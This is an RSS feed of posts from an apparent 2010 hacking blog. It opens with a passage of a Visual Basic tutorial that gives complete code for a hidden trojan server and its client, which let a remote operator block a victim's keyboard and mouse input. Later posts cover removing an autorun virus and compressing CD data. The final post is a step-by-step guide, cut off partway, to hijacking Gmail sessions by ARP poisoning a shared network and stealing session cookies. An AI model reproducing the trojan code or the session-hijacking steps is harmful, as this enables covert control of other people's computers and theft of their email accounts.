&amp;nbsp; &amp;nbsp; &amp;nbsp;App.&lt;span&gt;TaskVisible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;LocalPort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;2999&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;RemotePort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;455&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;Listen&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;This code sets the local listening port to 2999 and the remote port to 455. So now, we have a program that listens but still doesn’t do anything neat. Let’s make it block the input of the user completely when we tell it to!&lt;br /&gt;
&lt;br /&gt;
To do this little devious thing we need to add a module with the following code &lt;br /&gt;
&lt;br /&gt;
Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long&lt;br /&gt;
&lt;br /&gt;
Then we add this code to our main form:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px; text-align: left;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 180px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; win_ConnectionRequest&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;ByVal requestID &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span style="color: blue;"&gt;Close&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;Accept&lt;/span&gt; requestID
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;

&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; win_DataArrival&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;ByVal bytesTotal &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; win.&lt;span&gt;GetData&lt;/span&gt; GotDat
&amp;nbsp; &amp;nbsp; DoActions &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;GotDat&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;The code in the module is called a Windows API declaration. It uses a DLL file to do tasks that we want. Now this code still won’t block the user’s input, but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering, the code that we added to the form does two different things. The first sub makes it so all connection requests are automatically accepted. The second sub makes it so all data is automatically accepted, and it then passes all of the data to the function DoActions, which we are about to code.&lt;br /&gt;
&lt;br /&gt;
For the DoActions code, we want to make a public function in the module.  So add this code to the module and we are about done with the server of  the Trojan!&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px; text-align: left;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 148px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Public&lt;/span&gt; &lt;span style="color: blue;"&gt;Function&lt;/span&gt; DoActions&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;x &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;String&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Dim&lt;/span&gt; Action
&amp;nbsp; &amp;nbsp; &amp;nbsp;Select &lt;span style="color: blue;"&gt;Case&lt;/span&gt; x
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Case&lt;/span&gt; &lt;span style="color: red;"&gt;"block"&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Action = BlockInput&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;True&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;End&lt;/span&gt; Select
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Function&lt;/span&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;OK, now we have a program that blocks the user’s input when the data “block” is sent to it on port 2999. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding an unblock feature of your own. To do that, just call the BlockInput function with the argument False instead of True.&lt;br /&gt;
&lt;br /&gt;
Main Form&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px; text-align: left;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 308px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; Form_Load&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Me&lt;/span&gt;.&lt;span&gt;Visible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;App.&lt;span&gt;TaskVisible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;LocalPort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;2999&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;RemotePort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;455&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;Listen&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;

&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; win_ConnectionRequest&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;ByVal requestID &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: grey;"&gt;' As corrected by Darkness1337&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span style="color: blue;"&gt;Close&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;Accept&lt;/span&gt; requestID
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;

&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; win_DataArrival&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;ByVal bytesTotal &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;win.&lt;span&gt;GetData&lt;/span&gt; GotDat
&amp;nbsp; &amp;nbsp; &amp;nbsp;DoActions &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;GotDat&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;Remember to add your winsock control and name it to win if you use this code.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px; text-align: left;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 212px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div class="vb"&gt;Module

&lt;span style="color: blue;"&gt;Public&lt;/span&gt; &lt;span style="color: blue;"&gt;Declare&lt;/span&gt; &lt;span style="color: blue;"&gt;Function&lt;/span&gt; BlockInput Lib &lt;span style="color: red;"&gt;"user32"&lt;/span&gt; &lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;ByVal fBlock &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt; &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;Long&lt;/span&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 

&lt;span style="color: blue;"&gt;Public&lt;/span&gt; &lt;span style="color: blue;"&gt;Function&lt;/span&gt; DoActions&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;x &lt;span style="color: blue;"&gt;As&lt;/span&gt; &lt;span style="color: blue;"&gt;String&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Dim&lt;/span&gt; Action
&amp;nbsp; &amp;nbsp; &amp;nbsp;Select &lt;span style="color: blue;"&gt;Case&lt;/span&gt; x
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Case&lt;/span&gt; &lt;span style="color: red;"&gt;"block"&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Action = BlockInput&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: blue;"&gt;True&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;End&lt;/span&gt; Select
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Function&lt;/span&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;That’s all there is to the server side or Trojan part of it. Now on to the Client.&lt;br /&gt;
&lt;br /&gt;
Client&lt;br /&gt;
&lt;br /&gt;
The client will be what you interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command “block”, let’s make a client that sends the command “block”.&lt;br /&gt;
&lt;br /&gt;
Make a form and add a Winsock Control, a text box, and three buttons. The text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now let’s look at the code we would use to make our client.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px; text-align: left;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 324px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; cmdConnect_Click&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;IpAddy = txtIp.&lt;span&gt;Text&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span style="color: blue;"&gt;Close&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span&gt;RemotePort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;2999&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span&gt;RemoteHost&lt;/span&gt; = IpAddy
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span&gt;LocalPort&lt;/span&gt; = &lt;span style="color: #cc66cc;"&gt;9999&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span&gt;Connect&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;cmdConnect.&lt;span&gt;Enabled&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;

&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; cmdDisconnect_Click&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span style="color: blue;"&gt;Close&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;cmdConnect.&lt;span&gt;Enabled&lt;/span&gt; = &lt;span style="color: blue;"&gt;True&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; cmdBlockInput_Click&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;Win.&lt;span&gt;SendData&lt;/span&gt; &lt;span style="color: red;"&gt;"block"&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;That is the code for the client. All it does is get the IP address from txtIp and connect to it on remote port 2999. Then, when connected, you can send the “block” data to block off their input.</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/n7UlYh1AU3I/simple-trojan-in-vb-only-for-learning.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/10/simple-trojan-in-vb-only-for-learning.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-1287212445087816885</guid><pubDate>Thu, 30 Sep 2010 18:24:00 +0000</pubDate><atom:updated>2010-09-30T11:24:52.913-07:00</atom:updated><title /><description>&lt;h3 class="articleheading"&gt;Introduction&lt;/h3&gt;&lt;br /&gt;
If your PC is infected by some viruses, especially a variant of autorun, you’ll see an "Open with..." dialog when you try to open a drive. &lt;br /&gt;
&lt;br /&gt;
Here are the steps to delete it from your hard drive.&lt;br /&gt;
&lt;br /&gt;
Go to the command prompt and change to the drive where you get the "Open with..." dialog.&lt;br /&gt;
To do this:&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 66px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;step 1 : start -&amp;gt; run
step 2 : type cmd
step 3 : enter the drive name followed by a colon&lt;/pre&gt;&lt;/div&gt;Then type attrib&lt;br /&gt;
&lt;br /&gt;
It’ll list the attributes of all the files in the root of the drive (only files, not folders or the files inside those folders).&lt;br /&gt;
&lt;br /&gt;
You’ll see some of the files with the attributes S H R (system, hidden, read-only).&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img299.imageshack.us/img299/4030/pic1tut2hb8.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="132" src="http://img299.imageshack.us/img299/4030/pic1tut2hb8.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Type this code&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;blockquote&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;attrib -s -h -r *.*&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;The above line clears the system, hidden and read-only attributes of all the files in the root of the drive. Then delete the files that had the S H R attributes set (see picture) to remove the virus file:&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;del &amp;lt;filename&amp;gt;.&amp;lt;extension&amp;gt;, e.g. del w.cmd or del autorun.inf&lt;/blockquote&gt;&lt;div style="margin: 5px 20px 20px;"&gt;   &lt;/div&gt;After removing the virus file from each drive, log off your PC and log on again. This is a must. In some cases it may be optional, but to be safe, perform it.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;NOTE: The files shown here are just an example. The original virus file may have a different name. The virus can affect any drive; I've just taken the D: drive for illustration. THIS CODE SHOULD NOT BE USED ON THE "C:" DRIVE IF WINDOWS IS INSTALLED ON IT, AS THAT DRIVE CONTAINS SYSTEM FILES.&lt;/span&gt;&lt;/b&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/1R4r2lkTT7Y/introduction-if-some-viruses-are.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/09/introduction-if-some-viruses-are.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-2028210641264313398</guid><pubDate>Thu, 30 Sep 2010 18:22:00 +0000</pubDate><atom:updated>2010-09-30T11:22:12.091-07:00</atom:updated><title>Write more on your CD !!!</title><description>You must sometimes have noticed that you have 1 GB of data to write but are unable to decide which media to use: one DVD is more than required, one CD is not enough for the data, and if you use a second CD it would probably be half empty. So you will be confused about what to choose.&lt;br /&gt;
&lt;br /&gt;
We have all heard about NERO’s OverBurn feature, with which NERO can write up to 10 MB of extra data on your CD/DVD beyond its capacity. But have you ever heard that you can write up to 300 MB of extra data on your 700 MB CD? &lt;br /&gt;
&lt;br /&gt;
Yes, it is possible if you are using Linux. Linux has such powerful features that this can be made to happen. So I hope by now you know what I am going to discuss in this article.&lt;br /&gt;
&lt;br /&gt;
Before I start mentioning the steps, I would like to tell you that you &lt;b&gt;USE THIS TRICK COMPLETELY AT YOUR OWN RISK. Neither Go4Expert.com nor I will be responsible for any kind of damage done to your system or media.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Because I believe that Linux is a very delicate system. Only experts should handle it.&lt;br /&gt;
&lt;br /&gt;
So let’s start with the steps:&lt;br /&gt;
1. You need to download the following tools:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;zisofs-tools (latest) Download link: &lt;a href="http://www.kernel.org/pub/linux/utils/fs/zisofs" target="_blank"&gt;http://www.kernel.org/pub/linux/utils/fs/zisofs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CDRTools (&amp;lt; 2.01) Download link: &lt;a href="ftp://ftp.berlios.de/pub/cdrecord/" target="_blank"&gt;ftp://ftp.berlios.de/pub/cdrecord/&lt;/a&gt;&lt;br /&gt;
or&lt;br /&gt;
CDRKit (Latest)  Download link: &lt;a href="http://www.cdrkit.org/releases/" target="_blank"&gt;http://www.cdrkit.org/releases/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;GCC 3.5 or GCC 4 (recommended)&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
2 a. Compiling CDRTools:&lt;blockquote&gt;unpack the .tar.gz&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;tar -xvzf cdrtools-beta.tar.gz&lt;/pre&gt;&lt;/div&gt;configure:&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;./configure -prefix=$HOME/cdrtools&lt;/pre&gt;&lt;/div&gt;(Replace prefix with anything you like)&lt;br /&gt;
&lt;br /&gt;
compile and install:&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;make &amp;amp;&amp;amp; make install&lt;/pre&gt;&lt;/div&gt;&lt;/blockquote&gt;2 b. Compiling CDRKit&lt;blockquote&gt;unpack the .tar.gz&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;tar -xvzf cdrkit-current.tar.gz&lt;/pre&gt;&lt;/div&gt;configure:&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;cmake -DCMAKE_INSTALL_PREFIX=your/prefix .&lt;/pre&gt;&lt;/div&gt;compile and install:&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;make &amp;amp;&amp;amp; make install&lt;/pre&gt;&lt;/div&gt;&lt;/blockquote&gt;3. Compiling zisofs-tools&lt;blockquote&gt;Follow the same steps for zisofs-tools as you did for CDRTools, but do not specify a prefix.&lt;br /&gt;
&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 82px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;MAN Pages for review:
    -mkzftree : www.man.cx/mkzftree
    -mkisofs : www.man.cx/mkisofs
    -genisoimage : www.man.cx/genisoimage&lt;/pre&gt;&lt;div style="margin: 5px 20px 20px;"&gt; &lt;/div&gt;&lt;/blockquote&gt;4. Creating CD/DVD&lt;blockquote&gt;Create the directory tree for the CD contents in a separate directory ($HOME/cddir in the commands below).&lt;br /&gt;
Create another directory to hold the compressed filesystem:&lt;br /&gt;
&lt;blockquote&gt;&lt;code style="color: blue;"&gt;mkdir $HOME/compcd&lt;/code&gt;&lt;/blockquote&gt;Create the compressed structure:&lt;br /&gt;
&lt;blockquote&gt;&lt;code style="color: blue;"&gt;mkzftree $HOME/cddir $HOME/compcd&lt;/code&gt;&lt;/blockquote&gt;The compressed disc structure is now created; next, build the ISO image.&lt;br /&gt;
&lt;blockquote&gt;Switch to prefix/bin of CDRTools or CDRKit (whichever you are using)&lt;/blockquote&gt;and use mkisofs or genisoimage respectively:&lt;br /&gt;
&lt;blockquote&gt;genisoimage -R -z -o cd.iso $HOME/compcd&lt;/blockquote&gt;Burn the ISO image.&lt;br /&gt;
Insert the disc and mount it.&lt;br /&gt;
Change to the mount directory and type ls -la for a file listing.&lt;br /&gt;
Type &lt;code style="color: blue;"&gt;df -ha&lt;/code&gt; to see the space used on the disc.&lt;br /&gt;
&lt;/blockquote&gt;That's it.&lt;br /&gt;
&lt;br /&gt;
The drawback of this technique is that a disc made this way is readable only by Linux, and only by a Linux system with a recent kernel that has the module supporting this compressed format.</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/YrSe8mW9uAk/write-more-on-your-cd.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/09/write-more-on-your-cd.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-5715356308255444369</guid><pubDate>Thu, 30 Sep 2010 18:19:00 +0000</pubDate><atom:updated>2010-09-30T11:19:12.917-07:00</atom:updated><title>Hacking Gmail account using GX cookie</title><description>&lt;b style="color: red;"&gt;Disclaimer: This post is only for educational purposes.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Introduction&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Hacking web applications has always been a curiosity for script kiddies, and hacking a free web email account is every geek's first attempt. The method I will describe in this post is not new; the same method can be applied to Yahoo and other free web email services too.&lt;br /&gt;
&lt;br /&gt;
The method we will be using is cookie stealing: capturing the session cookie and replaying it back to the Gmail server. There are many ways to steal a cookie; one of them is XSS (cross-site scripting), discussed in an earlier post. We won’t be using any XSS here; in our attack we will use a local tool to capture the cookie and then use that cookie to get access to the Gmail account.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Assumption:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * You are on a Local Area Network (LAN) in a switched or wireless environment, for example an office, cyber café, mall, etc.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * You know basic networking.&lt;/blockquote&gt;&lt;br /&gt;
&lt;br /&gt;
Tools used for this attack:&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * Cain &amp;amp; Abel&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Network Miner&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Firefox web browser with Cookie Editor add-ons&lt;/blockquote&gt;&lt;br /&gt;
&lt;br /&gt;
Attack in detail:&lt;br /&gt;
&lt;br /&gt;
We assume you are connected to the LAN or wireless network. Our main goal is to capture the Gmail GX cookie from the network. We can only capture the cookie while someone is actually using their Gmail. I’ve noticed that in the office people normally check their email at lunch time or at the start of a shift. If you are in a cyber café or a mall, there are more chances of catching people using Gmail.&lt;br /&gt;
&lt;br /&gt;
We will go step by step.&lt;br /&gt;
&lt;br /&gt;
If you are using a wireless network, you can skip Step A.&lt;br /&gt;
&lt;br /&gt;
A] Using Cain to do ARP poisoning and routing:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
A switch mainly passes unicast traffic only to the port it is destined for. When X and Y are communicating with each other on a switched network, Z will not get to see what X &amp;amp; Y are communicating, so in order to sniff that communication you would have to poison the ARP tables for X &amp;amp; Y. On wireless you don’t have to do poisoning, because a wireless access point acts like a hub, which forwards any communication to all its ports (recipients).&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * Start Cain from Start &amp;gt; Program &amp;gt; Cain &amp;gt; Cain&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Click on the Start/Stop Sniffer tool icon on the toolbar. We will first scan the network to see which IPs are in use; this list will also help us launch the attack on the victim.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Then click on the Sniffer tab and then the Host tab below. Right-click within that spreadsheet and click on Scan Mac Addresses; from the Target section select&lt;/blockquote&gt;&lt;br /&gt;
All hosts in my subnet and then press OK. This will list all hosts connected to your network. You will notice that your own machine's IP does not appear in that list.&lt;br /&gt;
&lt;br /&gt;
How to check your physical IP?&lt;br /&gt;
&lt;blockquote&gt;&amp;gt; Click on Start &amp;gt; Run, type cmd and press Enter. In the command prompt type&lt;br /&gt;
ipconfig and press Enter. This should show the IP address assigned to your PC.&lt;br /&gt;
It will have the following output:&lt;/blockquote&gt;&lt;br /&gt;
&lt;br /&gt;
Ethernet adapter Local Area Connection:&lt;br /&gt;
&lt;br /&gt;
Connection-specific DNS Suffix . : xyz.com&lt;br /&gt;
&lt;blockquote&gt;IP Address. . . . . . . . . . . . : 192.168.1.2&lt;br /&gt;
Subnet Mask . . . . . . . . . . . : 255.255.255.0&lt;br /&gt;
Default Gateway . . . . . . . . . : 192.168.1.1&lt;br /&gt;
